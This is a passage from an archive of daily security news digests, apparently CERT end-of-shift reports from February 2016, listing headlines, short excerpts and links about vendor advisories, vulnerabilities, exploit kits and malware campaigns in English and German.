(CVE-2015-1819) *** http://www.ibm.com/support/docview.wss?uid=swg21976393 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Mobile (CVE-2014-8121) *** http://www.ibm.com/support/docview.wss?uid=swg21976290 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in nss-softokn affects IBM Security Access Manager for Mobile (CVE-2015-2730) *** http://www.ibm.com/support/docview.wss?uid=swg21976295 --------------------------------------------- *** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by an OpenSSH vulnerability (CVE-2008-5161) *** http://www.ibm.com/support/docview.wss?uid=swg21976082 --------------------------------------------- *** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by multiple NTP vulnerabilities *** http://www.ibm.com/support/docview.wss?uid=swg21975967 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM MQ Light (CVE-2015-3197) *** http://www.ibm.com/support/docview.wss?uid=swg21976345 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center (CVS-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21975832 --------------------------------------------- *** IBM Security Bulletin: A Security Vulnerability has been identified in Apache Solr shipped with IBM Operations Analytics - Log Analysis *** http://www.ibm.com/support/docview.wss?uid=swg21975544 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in cURL and libcURL affect IBM Security Access Manager (CVE-2014-3613, CVE-2014-8150) *** http://www.ibm.com/support/docview.wss?uid=swg21974736 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM MQ Light (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976341 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 9-02-2016
by Daily end-of-shift report 09 Feb '16

09 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 08-02-2016 18:00 − Dienstag 09-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Gate To Nuclear EK Uses Fake CloudFlare DDoS Check *** --------------------------------------------- This rogue CloudFlare page hides a malicious payload. Categories: ExploitKits Tags: cloudflareEKNuclear(Read more...) --------------------------------------------- https://blog.malwarebytes.org/exploitkits/2016/02/gate-to-nuclear-ek-uses-f… *** Patching Complex Web Vulnerabilities Using ModSecurity WAF *** --------------------------------------------- In this blog post we will demonstrate complicated examples of common web application vulnerabilities, and see how they can be mitigated with ModSecurity WAF. --------------------------------------------- https://www.htbridge.com/blog/patching-complex-web-vulnerabilities-using-mo… *** Its 2016 and a font file can own your computer *** --------------------------------------------- Libgraphite font library buggy and vulnerable in Firefox, Thunderbird, WordPad and more says Talos Cisco-owned Talos has announced a bunch of font library bugs present in apps running on Windows and Linux, affecting client and-server-side machines. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/02/09/libgraphite… *** Power Grid Honeypot Puts Face on Attacks *** --------------------------------------------- Researchers from MalCrawler built a honeypot mimicking an electronic management system at the heart of a power grid, exposing attackers' behavior once they have access to critical infrastructure systems. --------------------------------------------- http://threatpost.com/power-grid-honeypot-puts-face-on-attacks/116217/ *** Russian hackers used malware to manipulate the Dollar/Ruble exchange rate *** --------------------------------------------- Russian-language hackers have managed to break into Russian regional bank Energobank, infect its systems, and gain unsanctioned access to its trading system terminals, which allowed them to manipulat... --------------------------------------------- http://www.net-security.org/malware_news.php?id=3201 *** How to Hack the Power Grid Through Home Air Conditioners *** --------------------------------------------- Researchers show how hackers can manipulate the remote on-off device installed on some air conditioners to cause a blackout. --------------------------------------------- http://www.wired.com/2016/02/how-to-hack-the-power-grid-through-home-air-co… *** (Not only) Oracle Java Windows installer vulnerable *** --------------------------------------------- Oracle hat einen Out-of-Band Patch für Java 6, 7 und 8 für Windows veröffentlicht, mit dem eine Sicherheitslücke im Installationsprozess geschlossen wird. Es sind dazu bereits zahlreiche Medienberichte erschienen, in denen allerdings häufig die Tatsache ausser acht gelassen wird, dass es sich hier nicht um eine Java-spezifische Schwachstelle handelt. Das Problem - Stichwort "Binary Planting" -... --------------------------------------------- http://www.cert.at/services/blog/20160209102305-1678.html *** Security Bulletins Posted *** --------------------------------------------- Security Bulletins for Adobe Photoshop and Bridge (APSB16-03), Flash Player (APSB16-04), Adobe Experience Manager (APSB16-05) and Adobe Connect (APSB16-07) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. This... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1315 *** DSA-3472 wordpress - security update *** --------------------------------------------- Two vulnerabilities were discovered in wordpress, a web blogging tool.The Common Vulnerabilities and Exposures project identifies thefollowing problems: --------------------------------------------- https://www.debian.org/security/2016/dsa-3472 *** DSA-3471 qemu - security update *** --------------------------------------------- Several vulnerabilities were discovered in qemu, a full virtualizationsolution on x86 hardware. --------------------------------------------- https://www.debian.org/security/2016/dsa-3471 *** DSA-3470 qemu-kvm - security update *** --------------------------------------------- Several vulnerabilities were discovered in qemu-kvm, a fullvirtualization solution on x86 hardware. --------------------------------------------- https://www.debian.org/security/2016/dsa-3470 *** DSA-3469 qemu - security update *** --------------------------------------------- Several vulnerabilities were discovered in qemu, a full virtualizationsolution on x86 hardware. --------------------------------------------- https://www.debian.org/security/2016/dsa-3469 *** USN-2880-2: Firefox regression *** --------------------------------------------- Ubuntu Security Notice USN-2880-28th February, 2016firefox regressionA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryUSN-2880-1 introduced a regression in Firefox.Software description firefox - Mozilla Open Source web browser DetailsUSN-2880-1 fixed vulnerabilities in Firefox. This update introduced aregression which caused Firefox to crash on startup with some configurations.This update fixes the problem.We apologize --------------------------------------------- http://www.ubuntu.com/usn/usn-2880-2/

1 0

Tageszusammenfassung - Montag 8-02-2016
by Daily end-of-shift report 08 Feb '16

08 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 05-02-2016 18:00 − Montag 08-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Magento PCI Compliance Issues and Theft Over TLS *** --------------------------------------------- With about 30% of the market share, Magento is gradually becoming a "WordPress" of the ecommerce world. Like WordPress, it becomes a major target for hackers due to its popularity. However, in the case of Magento, the main goal that hackers pursue is to steal money, either from shop customers or the shop owners. During... --------------------------------------------- https://blog.sucuri.net/2016/02/theft-over-tls-or-illusion-of-pci-complianc… *** Extracting and distributing information on incidents, or what is PROKI *** --------------------------------------------- In the last blogpost, I promised to write something about our new project PROKI. PROKI is the abbreviation of the Czech phrase for "prediction and protection against cyber incidents" and in this project, our team set two goals for itself. --------------------------------------------- http://en.blog.nic.cz/2016/02/05/extracting-and-distributing-information-on… *** GitHub bug bounty hunting *** --------------------------------------------- Last month, I went hunting for security bugs in GitHub, a popular platform for sharing and collaborating on code. After spending many hours mapping out GitHub's infrastructure, and testing for weaknesses without any significant results or leads, I shifted my focus to the service providers. This is a write-up about two of the issues I found, which both have since been addressed. --------------------------------------------- https://medium.com/@ircbot/github-bug-bounty-hunting-741de324be1c *** Netgear-Router-Software: Schwachstelle ermöglicht Dateiupload und Download *** --------------------------------------------- Die Router-Verwaltungssoftware Netgear Management System hat ein Sicherheitsproblem. Angreifer können zwischen einer Remote-Code-Execution und einer Directory-Traversal-Schwachstelle wählen. Einen Patch gibt es bislang nicht. --------------------------------------------- http://www.golem.de/news/netgear-router-software-schwachstelle-ermoeglicht-… *** Bankomat-Trick: Geld abheben, Kontostand bleibt gleich *** --------------------------------------------- Die Angriffe auf Finanzinstitute werden immer erfinderischer. Eine neue Schadsoftware bucht Finanzbeträge aufs Konto zurück, nachdem diese bei Bankomaten abgehoben wurden. --------------------------------------------- http://futurezone.at/digital-life/bankomat-trick-geld-abheben-kontostand-bl… *** T9000 backdoor steals documents, records Skype conversations, victims actions *** --------------------------------------------- A new backdoor Trojan with spyware capabilities is being used in targeted attacks against organizations based in the United States. It has been dubbed T9000, since its a newer, improved version of th... --------------------------------------------- http://www.net-security.org/malware_news.php?id=3199 *** Avast SafeZone Browser Lets Attackers Access Your Filesystem *** --------------------------------------------- Just two days after Comodos Chromodo browser was publicly shamed by Google Project Zero security researcher Tavis Ormandy, its now Avasts turn to be scorned for failing to provide a "secure" browser for its users. --------------------------------------------- http://news.softpedia.com/news/avast-safezone-browser-lets-attackers-access… *** Adwind: FAQ *** --------------------------------------------- Adwind - a cross-platform RAT, multifunctional malware program which is distributed through a single malware-as-a-service platform. Different versions of the Adwind malware have been used in attacks against at least 443,000 private users, commercial and non-commercial organizations around the world. --------------------------------------------- http://securelist.com/blog/research/73660/adwind-faq/ *** Java installer flaw shows why you should clear your Downloads folder *** --------------------------------------------- On most computers, the default download folder quickly becomes a repository of old and unorganized files that were opened once and then forgotten about. A recently fixed flaw in the Java installer highlights why keeping this folder clean is important.On Friday, Oracle published a security advisory recommending that users delete all the Java installers they might have laying around on their computers and use new ones for versions 6u113, 7u97, 8u73 or later. The reason is that older Java... --------------------------------------------- http://www.cio.com/article/3030707/security/java-installer-flaw-shows-why-y… *** Netgear Pro NMS 300 Code Execution / File Download *** --------------------------------------------- Topic: Netgear Pro NMS 300 Code Execution / File Download Risk: High Text:>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro ... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020070 *** Oracle Security Alert for CVE-2016-0603 - 5 February 2016 *** --------------------------------------------- To be successfully exploited, this vulnerability requires that an unsuspecting user be tricked into visiting a malicious web site and download files into the user's system before installing Java SE 6, 7 or 8. Though relatively complex to exploit, this vulnerability may result, if successfully exploited, in a complete compromise of the unsuspecting user’s system. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0603-28743… *** Bugtraq: [security bulletin] HPSBGN03434 rev.1 - HP Continuous Delivery Automation using Java Deserialization, Remote Arbitrary Code Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/537461 *** Bugtraq: [security bulletin] HPSBHF03431 rev.2 - HPE Network Switches, local Bypass of Security Restrictions, Indirect Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537460 *** 0Day Vulnerabilities in Advantech WebAccess *** --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-146/ http://www.zerodayinitiative.com/advisories/ZDI-16-147/ http://www.zerodayinitiative.com/advisories/ZDI-16-148/ http://www.zerodayinitiative.com/advisories/ZDI-16-149/ http://www.zerodayinitiative.com/advisories/ZDI-16-150/ http://www.zerodayinitiative.com/advisories/ZDI-16-151/ http://www.zerodayinitiative.com/advisories/ZDI-16-152/ http://www.zerodayinitiative.com/advisories/ZDI-16-153/ http://www.zerodayinitiative.com/advisories/ZDI-16-154/ http://www.zerodayinitiative.com/advisories/ZDI-16-155/ --------------------------------------------- *** SSA-253230 (Last Update 2016-02-08): Vulnerabilities in SIMATIC S7-1500 CPU *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-253230… *** Bugtraq: Local Microsoft Windows 7 / 8 / 10 Buffer Overflow via Third-Party USB-Driver (ser2co64.sys) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537471 *** WooCommerce - Store Toolkit Plugin Privilege Escalation <= 1.5.6 *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8385 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: A vulnerability in net-snmp affects IBM DataPower Gateways (CVE-2015-5621) *** http://www.ibm.com/support/docview.wss?uid=swg21975340 --------------------------------------------- *** IBM Security Bulletin: A cross-site scripting vulnerability has been identified in IBM Security Access Manager for Web (CVE-2015-8531) *** http://www.ibm.com/support/docview.wss?uid=swg21974651 --------------------------------------------- *** IBM Security Bulletin: IBM Security Access Manager for Web is affected by multiple NTP vulnerabilities *** http://www.ibm.com/support/docview.wss?uid=swg21974652 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in Net-SNMP affect IBM Security Access Manager for Web (CVE-2014-3565, CVE-2015-5621) *** http://www.ibm.com/support/docview.wss?uid=swg21974644 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM QRadar SIEM, and QRadar Incident Forensics (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976113 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM DataPower Gateways (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974965 --------------------------------------------- *** IBM Security Bulletin: Information disclosure vulnerability found in IBM WebSphere Commerce (CVE-2015-7444) *** http://www.ibm.com/support/docview.wss?uid=swg21974307 --------------------------------------------- *** IBM Security Bulletin: IBM Security Access Manager for Web is affected by Network Security Services (NSS) vulnerabilities (CVE-2015-7181, CVE-2015-7182, CVE-2015-7183) *** http://www.ibm.com/support/docview.wss?uid=swg21974648 --------------------------------------------- *** IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by Network Security Services (NSS) vulnerabilities (CVE-2015-7181, CVE-2015-7182, CVE-2015-7183) *** http://www.ibm.com/support/docview.wss?uid=swg21974650 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in GSKit affect IBM Security Access Manager for Web (CVE-2015-7421, CVE-2015-7420) *** http://www.ibm.com/support/docview.wss?uid=swg21974750 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in GSKit affect IBM Security Access Manager for Mobile (CVE-2015-7421, CVE-2015-7420) *** http://www.ibm.com/support/docview.wss?uid=swg21974747 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Access Manager for Mobile *** http://www.ibm.com/support/docview.wss?uid=swg21973139 --------------------------------------------- *** IBM Security Bulletin: A libxml vulnerability affects IBM Security Access Manager for Web (CVE-2015-1819) *** http://www.ibm.com/support/docview.wss?uid=swg21974737 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in XML processing affects IBM DataPower Gateways (CVE-2015-1819) *** http://www.ibm.com/support/docview.wss?uid=swg21975341 --------------------------------------------- *** IBM Security Bulletin: IBM Tivoli Storage Manager ASNODENAME Vulnerability (CVE-2015-7408) *** http://www.ibm.com/support/docview.wss?uid=swg21975957 --------------------------------------------- *** IBM Security Bulletin: A Linux-PAM vulnerability affects IBM Security Access Manager for Web (CVE-2015-3238) *** http://www.ibm.com/support/docview.wss?uid=swg21974738 --------------------------------------------- *** IBM Security Bulletin: A Linux-PAM vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-3238) *** http://www.ibm.com/support/docview.wss?uid=swg21975882 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2014-8121) *** http://www.ibm.com/support/docview.wss?uid=swg21974653 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in nss-softokn affects IBM Security Access Manager for Web (CVE-2015-2730) *** http://www.ibm.com/support/docview.wss?uid=swg21974657 --------------------------------------------- *** IBM Security Bulletin: OpenSSL as used in IBM QRadar SIEM is vulnerable to a Denial of Service attack, and Sensitive Information Exposure. (CVE-2015-3194, CVE-2015-3195, CVE-2015-3196) *** http://www.ibm.com/support/docview.wss?uid=swg21976148 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 5-02-2016
by Daily end-of-shift report 05 Feb '16

05 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 04-02-2016 18:00 − Freitag 05-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** WP-Invoice <= 4.1.0 - Multiple Vulnerabilities *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8378 *** User Meta Manager <= 3.4.6 - Authenticated Blind SQL Injection *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8380 *** User Meta Manager <= 3.4.6 - Privilege Escalation *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8379 *** Racing MIDI messages in Chrome *** --------------------------------------------- This is a guest blog post by Oliver Chang from the Chrome Security team.This post is about an exceptionally bad use after free bug in Chrome's browser process that affected Linux, Chrome OS and OS X. What makes this bug interesting is the fact that it could be directly triggered from the web without .. --------------------------------------------- http://googleprojectzero.blogspot.com/2016/02/racing-midi-messages-in-chrom… *** DSA-3466 krb5 - security update *** --------------------------------------------- Several vulnerabilities were discovered in krb5, the MIT implementation of Kerberos. The Common Vulnerabilities and Exposures project identifies the following .. --------------------------------------------- https://www.debian.org/security/2016/dsa-3466 *** Neutrino Exploit Kit Not Responding - Bug or Feature? *** --------------------------------------------- A couple of weeks ago we were looking at some exploit kits in one of our lab environments and noticed a decline in the number of Neutrino instances were seeing. This sent us on yet another journey to investigate Neutrino .. --------------------------------------------- http://trustwave.com/Resources/SpiderLabs-Blog/Neutrino-Exploit-Kit-Not-Res… *** Chrome picks up bonus security features on Windows 10 *** --------------------------------------------- The Windows 10 November update (version 1511, build 10586) included a handful of new security features to provide protection against some security issues that have kept on popping up in Windows for a number of years. Google yesterday added source .. --------------------------------------------- http://arstechnica.com/information-technology/2016/02/chrome-picks-up-bonus… *** A trip through the spam filters: more malspam with zip attachments containing .js files *** --------------------------------------------- I was discussing malicious spam (malspam) with a fellow security professional earlier this week. He was examining malspam with zip attachments containing .js files. This is something Ive covered previously in ISC .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20697 *** Verschlüsselungs-Trojaner TeslaCrypt 2 geknackt; Kriminelle rüsten nach *** --------------------------------------------- Opfer des berüchtigten Verschlüsselungs-Trojaners TeslaCrypt können aufatmen: Das kostenlose Tool TeslaDecoder kann zumindest die Dateien der Version 2 entschlüsseln. Doch die Betrüger schlafen nicht: Aktuell kursiert schon Version 3. --------------------------------------------- http://heise.de/-3092667 *** Eset NOD32 Antivirus 9 gefährdet https-Verschlüsselung *** --------------------------------------------- Eset NOD32 Antivirus 9 installiert einen SSL-Filter, der sich in die Verschlüsselung einklinkt. Wie heise Security entdeckte, akzeptiert er dabei unter Umständen gefälschte Zertifikate; ein Update des Herstellers beseitigt den Fehler. --------------------------------------------- http://heise.de/-3095024 *** Dridex: Botnet verteilt Virenscanner *** --------------------------------------------- Gelingt es Cyberkriminellen, ihre Malware auf fremden Rechnern einzuschleusen, nutzen sie dies mitunter aus, um sie zum Teil eines Botnets zu machen. Über ihre Server steuern sie die kompromittierten Computer und nutzen ihre .. --------------------------------------------- http://derstandard.at/2000030450321 *** The Malware Museum @ Internet Archive *** --------------------------------------------- Here's what submitting a virus sample looked like back in the days of 5" floppy disks. And now you can see classic viruses in action at The Malware Museum. Do you feel like emulating old malware inside a MS-DOS Virtual Machine inside .. --------------------------------------------- https://labsblog.f-secure.com/2016/02/05/the-malware-museum-internet-archiv… *** Positive Research Center *** --------------------------------------------- In December 2015, I found a critical vulnerability in one of PayPal business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe Java object deserialization and to access production databases. I immediately reported this bug to PayPal security team, and it was fixed promptly. --------------------------------------------- http://blog.ptsecurity.com/2016/02/paypal-remote-code-execution.html

1 0

Tageszusammenfassung - Donnerstag 4-02-2016
by Daily end-of-shift report 04 Feb '16

04 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 03-02-2016 18:00 − Donnerstag 04-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Weiterhin etliche IP-Kameras von Aldi unzureichend geschützt *** --------------------------------------------- Nach wie vor ist mindestens eine dreistellige Zahl der bei Aldi verkauften Maginon-Kameras ohne Passwort über das Internet steuerbar. Unterdessen hat sich herausgestellt, dass der Hersteller bereits im Juni 2015 informiert wurde. --------------------------------------------- http://heise.de/-3092642 *** Cisco Unified Communications Manager SQL Injection Vulnerability *** --------------------------------------------- A vulnerability in the Cisco Unified Communications Manager SQL database interface could allow an authenticated, remote attacker to impact the confidentiality of the system by executing arbitrary SQL queries. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** CERT: Poor password policy leaves OpenELEC operating system vulnerable to hackers *** --------------------------------------------- The CERT Division at Carnegie Mellon University yesterday issued an alert detailing a password vulnerability in the Open Embedded Linux Entertainment Center operating system. --------------------------------------------- http://www.scmagazine.com/cert-poor-password-policy-leaves-openelec-operati… *** Macro Redux: the Premium Package *** --------------------------------------------- Earlier this week we came across an interesting spam email. It was targeted at one of our customers in the retail industry. It contained a Microsoft Word document (MD5 = b74604d0081e68e91d64b361601d79c4) with a rather small macro in it. All that macro did was save a copy of the document as RTF, open it and then .. --------------------------------------------- http://labs.bromium.com/2016/02/03/macro-redux-the-premium-package/ *** Cisco Jabber Guest Server HTTP Web-Based Management Interface Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the HTTP web-based management interface of the Cisco Jabber Guest application could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Unity Connection Web Framework Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco Unity Connection could allow an unauthenticated, remote attacker to execute a cross-site scripting (XSS) attack. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Fake Adobe Flash Update OS X Malware *** --------------------------------------------- Yesterday, while investigating some Facebook click-bait, I came across a fake Flash update that is targeting OS X users. Fake flash updates have been very common to infect OS X. They do not rely on a vulnerability in the operating system. Instead, the user is asked to willingly install them, by making .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20693 *** No More Deceptive Download Buttons *** --------------------------------------------- In November, we announced that Safe Browsing would protect you from social engineering attacks - deceptive tactics that try to trick you into doing something dangerous, like installing unwanted software or revealing your personal information (for example, passwords, phone numbers, or credit cards). You may .. --------------------------------------------- https://googleonlinesecurity.blogspot.co.uk/2016/02/no-more-deceptive-downl… *** l+f: Web-Dienst prüft Präsenz sicherheitsrelevanter HTTP-Header *** --------------------------------------------- Mit securityheaders.io kann man herausfinden, welche Schutzfunktionen ein Server über die HTTP-Header scharf schaltet. --------------------------------------------- http://heise.de/-3095001

1 0

Tageszusammenfassung - Mittwoch 3-02-2016
by Daily end-of-shift report 03 Feb '16

03 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 02-02-2016 18:00 − Mittwoch 03-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** WordPress 4.4.2 Security and Maintenance Release *** --------------------------------------------- https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance… *** Cisco WebEx Meetings Server Multiple Cross-Site Scripting Vulnerabilities *** --------------------------------------------- A vulnerability in the web framework code of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of the affected system. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Sauter moduWeb Vision Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for three vulnerabilities in Sauter's moduWeb Vision application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-033-01 *** GE SNMP/Web Interface Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for two vulnerabilities in the GE SNMP/Web Interface adapter. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02 *** DMA Locker: New Ransomware, But No Reason To Panic *** --------------------------------------------- A new piece of ransomware which looks a little clumsy. --------------------------------------------- https://blog.malwarebytes.org/news/2016/02/draft-dma-locker-a-new-ransomwar… *** Enhanced Mitigation Experience Toolkit (EMET) version 5.5 is now available *** --------------------------------------------- The Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, .. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2016/02/02/enhanced-mitigation-exper… *** DSA-3465 openjdk-6 - security update *** --------------------------------------------- Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform, resulting in breakouts of the Java sandbox, information disclosure, denial of service and insecure cryptography. --------------------------------------------- https://www.debian.org/security/2016/dsa-3465 *** Bypassing Bitrix WAF via tiny regexp error *** --------------------------------------------- Bitrix24 is one of the first and most secure cross-platform corporate software with integrated WAF and RASP. Lets see how we can bypass them. --------------------------------------------- https://www.htbridge.com/blog/bypassing-bitrix-web-application-firewall-via… *** Smartphone-Security: Root-Backdoor macht Mediatek-Smartphones angreifbar *** --------------------------------------------- Eine Debug-Funktion für Vergleichstests im chinesischen Markt führt dazu, dass zahlreiche Smartphones mit Mediatek-Chipsatz verwundbar sind. Angreifer können eine lokale Root-Shell aktivieren. Auch Geräte auf dem deutschen Markt könnten betroffen sein. --------------------------------------------- http://www.golem.de/news/smartphone-security-root-backdoor-macht-mediatek-s… *** l+f: Neuland, USA *** --------------------------------------------- Das Milliardenprojekt F-35 verzögert sich um mindestens ein Jahr, weil Techniker aus Sicherheitsgründen nicht auf eine Datenbank zugreifen können. --------------------------------------------- http://heise.de/-3092005 *** MMD-0051-2016 - Debunking a tiny ELF remote backdoor (shellcode shellshock part 2) *** --------------------------------------------- In September 2014 during the shellshock exploitation was in the rush I analyzed a case (MMD-0027-2014) of an ELF dropped payload via shellshock attack, with the details can be read in-->[here] Today I found an interesting ELF x32 sample that was reported several hours back, the infection vector is also ShellShock, the .. --------------------------------------------- http://blog.malwaremustdie.org/2016/02/mmd-0051-2016-debungking-tiny-elf.ht… *** Comodo: "Sicherer" Browser mit groben Sicherheitsdefiziten *** --------------------------------------------- Google warnt vor der Verwendung - Hebelt Same Origin Policy des Browsers --------------------------------------------- http://derstandard.at/2000030313692 *** Thunderstrike 2: Sicherheitsforscher arbeiten inzwischen für Apple *** --------------------------------------------- Der Mac-Hersteller hat eine Sicherheitsfirma übernommen, die an der Entwicklung von "Thunderstrike 2" beteiligt war. Die Forscher zeigten Schwachstellen, die das Einschleusen eines Schädlings auf Firmware-Ebene ermöglichen – nicht nur auf Macs. --------------------------------------------- http://heise.de/-3092644 *** Phishing-Angriff: Nutzer sollen Amazon-Zertifikat installieren *** --------------------------------------------- Phishing-Angriffe gehören zu den nervigen Alltäglichkeiten von Internetnutzern. Eine spezielle Masche versucht jetzt, Android-Nutzer zur Installation eines angeblichen Sicherheitszertifikates zu bewegen. Komisch, dass das Zertifikat die Endung .apk aufweist. --------------------------------------------- http://www.golem.de/news/phishing-angriff-nutzer-sollen-amazon-zertifikat-i… *** Cisco Nexus 9000 Series ACI Mode Switch ICMP Record Route Vulnerability *** --------------------------------------------- A vulnerability in the ICMP implementation in the Cisco Nexus 9000 Series Application Centric Infrastructure (ACI) Mode Switch could allow an unauthenticated, remote attacker to cause the switch to reload, resulting in a denial of service (DoS) condition. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Application Policy Infrastructure Controller Access Control Vulnerability *** --------------------------------------------- A vulnerability in the role-based access control (RBAC) of the Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated remote user to make configuration changes outside of their configured access privileges. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco ASA-CX and Cisco Prime Security Manager Privilege Escalation Vulnerability *** --------------------------------------------- A vulnerability in the role-based access control of Cisco ASA-CX and Cisco Prime Security Manager (PRSM) could allow an authenticated, remote attacker to change the password of any user on the system. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Bypass Windows AppLocker *** --------------------------------------------- AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running. --------------------------------------------- http://en.wooyun.io/2016/01/28/Bypass-Windows-AppLocker.html

1 0

Tageszusammenfassung - Dienstag 2-02-2016
by Daily end-of-shift report 02 Feb '16

02 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 01-02-2016 18:00 − Dienstag 02-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cyberangriff auf A1 verursacht Ausfall des mobilen Netzes *** --------------------------------------------- Attacken seit Samstag - Zeitpunkt der Fehlerbehebung noch nicht in Sicht --------------------------------------------- http://derstandard.at/2000030190051 *** red|blue: A Soft-ish Introduction to Malware Analysis for Incident Responders *** --------------------------------------------- One of my resolutions for the New Year is to spend more time conducting behavioral and static analysis of malicious PE files. I recently spent time watching some of the Cybrary Malware Reverse Engineering material and wanted to document my efforts here and share my notes and additional thoughts with you. --------------------------------------------- http://www.redblue.team/2016/02/a-soft-introduction-to-malware-analysis.html *** Malwarebytes Anti-Malware Vulnerability Disclosure *** --------------------------------------------- In early November, a well-known and respected security researcher by the name of Tavis Ormandy alerted us to several security vulnerabilities in the consumer version of Malwarebytes Anti-Malware. Within days, we were able to fix several of the vulnerabilities server-side and are now internally .. --------------------------------------------- https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulner… *** Massive Admedia/Adverting iFrame Infection *** --------------------------------------------- This past weekend we registered a spike in WordPress infections where hackers injected encrypted code at the end of all legitimate .js files. The distinguishing features of this malware are: 32 hex digit comments at the beginning and end of the malicious .. --------------------------------------------- https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection… *** Google plugs Android vulns *** --------------------------------------------- Happy days if you own a Nexus Five "critical," four "high" severity and one merely "moderate" bug make up the menu of Android security patches, which are now available for Nexus devices and .. --------------------------------------------- www.theregister.co.uk/2016/02/02/google_plugs_android_vulns/ *** Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution *** --------------------------------------------- The vulnerability is caused due to a boundary error in the processing of a project file, which can be exploited to cause a buffer overflow when a user opens e.g. a specially crafted .DQP project file with a large array of bytes inserted in the Description element. Successful exploitation could allow execution of 